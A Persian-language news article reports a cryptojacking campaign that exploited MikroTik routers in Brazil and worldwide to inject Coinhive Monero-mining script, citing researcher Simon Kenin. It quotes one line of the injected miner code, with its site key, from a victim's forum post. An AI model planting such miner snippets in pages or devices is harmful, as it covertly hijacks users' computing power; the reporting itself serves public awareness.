روتر‌های میکروتیک، همدست هکر‌ها برای استخراج مونرو

70,000 روتر آلوده در برزیل و 170,820 در سراسر جهان وجود دارد

سیمون کنین(Simon Kenin)، محقق امنیتی در شرکت تراست‌ویو، در پایان ماه ژوئیه متوجه شد که روترهای اینترنتی برند میکروتیک(MikroTik) در برزیل، افزایش چشمگیری در پردازش ناشی از برنامه‌ای با نام Coinhive از خود نشان می‌دادند.

استفاده از Coinhive

Coinhive نام برنامه‌ای است که به کاربر اجازه‌ی ماین رمزارز مونرو را می‌دهد. این برنامه می‌تواند با یک وب‌سایت یکپارچه‌سازی شده و استفاده‌های قانونی داشته باشد. برای مثال، برای وب‌سایت‌های خیریه به منظور جمع‌آوری پول. اما به ابزار محبوب هکر‌ها نیز تبدیل شده است. آن‌ها این برنامه را مخفیانه در کامپیوتر دیگران نصب کرده و در نهایت منتظر می‌مانند تا مقدار زیادی رمزارز دریافت کنند.

میکروتیک شرکتی در لیتونی است که سخت‌افزار/نرم‌افزار اتصالات اینترنتی را تولید می‌کند. طبق گزارش بیش از 70 هزار روتر این شرکت در کشور برزیل استفاده شده است.

آقای کنین با انجام تحقیقات متوجه شد که تمام Coinhive ها از یک کلید استفاده می‌کنند و این بدین معناست  که تمام رمزارز‌های ماین شده به یک اکانت واریز می‌شوند. او حتی یک بیمارستان را یافت که آلوده شده و برای هکر‌ها رمزارز ماین می‌نمود. او سپس این پست اینترنتی را یافت:

ترجمه آن به این صورت است:

من به کمک نیاز دارم: بر روی لینک Hello r/InternetBrasil کلیک کردم، که در آن اسکریپ ماینینگ رمزارز تعبیه شده است، مدتی پیش این مشکل را بر روی شبکه‌ام بوجود آمد(که بر روی کامپیوتر و گوشی موبایل این مشکل وجود دارد). DNS را تغییر دادم، روتور را قطع و آن را مستقیم به مودم متصل نمودم اما کار نمی‌کند. و این اسکریپی است که بارگیری می‌شود.

var miner = new CoinHive.Anonymous (‘hsFAjjijTyibpVjCmfJzlfWH3hFqWVT3’, {throttle: 0.2}); miner.start ();

اسکریپی که CoinHive را بارگذاری می‌کند

170,820 روتر و میلیون‌ها کاربر

این کاربر سپس در ارسالی جداگانه اعلام کرد که این مشکل خود به خود حل شده است. روتر ارائه دهنده‌ی سرویس اینترنتی (که او با بیمارستان ذکر شده به اشتراک گذاشته بود) آلوده شده بود.

این روش آسیب‌پذیری موجود در روتر میکروتیک را هدف قرار داده است که به سارقان اجازه‌ی دسترسی از راه دور و به‌صورت ناشناس را می‌دهد. میکروتیک مشکل را در روتر‌هایی که این مشکل را گزارش کردند، حل کرده است. اما کنین هشدار داده است که این موضوع می‌تواند آغازی برای یک حمله وسیع‌تر باشد، 170820 روتر هم‌اکنون مشکوک به آلوده شده و تعبیه‌ی Coinhive هستند.

کنین گفت:

اجازه بدید تا تاکید نمایم این حمله چقدر فاجعه بار می‌تواند باشد. حمله کننده با زیرکی در عوض آلوده کردن سایت‌های کوچک با بازدید کننده‌ی کم، یا پیدا کردن راه‌های پیچیده به منظور اجرای نرم‌افزار‌های مخرب بر روی کاربر نهایی، مستقیما به سراغ منبع یعنی تجهیزات روتر carrier-grade رفته است.

صدها هزار نوع از این تجهیزات در سراسر جهان وجود دارند که توسط ISPها و سازمان‌ها و کسب و کار‌ها مورد استفاده قرار می‌گیرد، هر دستگاه حداقل ده‌ها و در برخی موارد هزاران کاربر را در هر روز سرویس دهی می‌نماید.

Simon Kenin

کنین همچنین مشاهده کرد که کد‌های هکر‌ها در حال تغییر بود، او با انجام تحقیقات نشان داد که با گذر زمان سارقین عملکرد خود را بهبود می‌بخشند.

پانزده میلیون کاربر در ماه ژانویه در سراسر آمریکای جنوبی، جنوب شرقی آسیا و شمال آفریقا توسط ویروس سرقت رمزارز که در تبلیغات پنهان شده بود، مورد حمله قرار گرفتند. در ماه می نوعی ویروس سرقت رمزارز گزارش شده است که در هنگام روبرو شدن با آنتی ویروس کامپیوتر میزبان را خاموش می‌کند، و در ماه جولای مردی بدلیل طرح ریزی سرقت رمزارز در ژاپن به یک سال حبس محکوم شد.

با توجه به محبوب شدن رمزارزها برای هکر‌ها آیا باید شرکت‌های سرویس دهنده‌ی محصولات اینترنتی اقدامات بیشتری را برای جلوگیری از این قبل رویدادها انجام دهند؟ نظر خود را به صورت کامنت با ما درمیان بگذارید.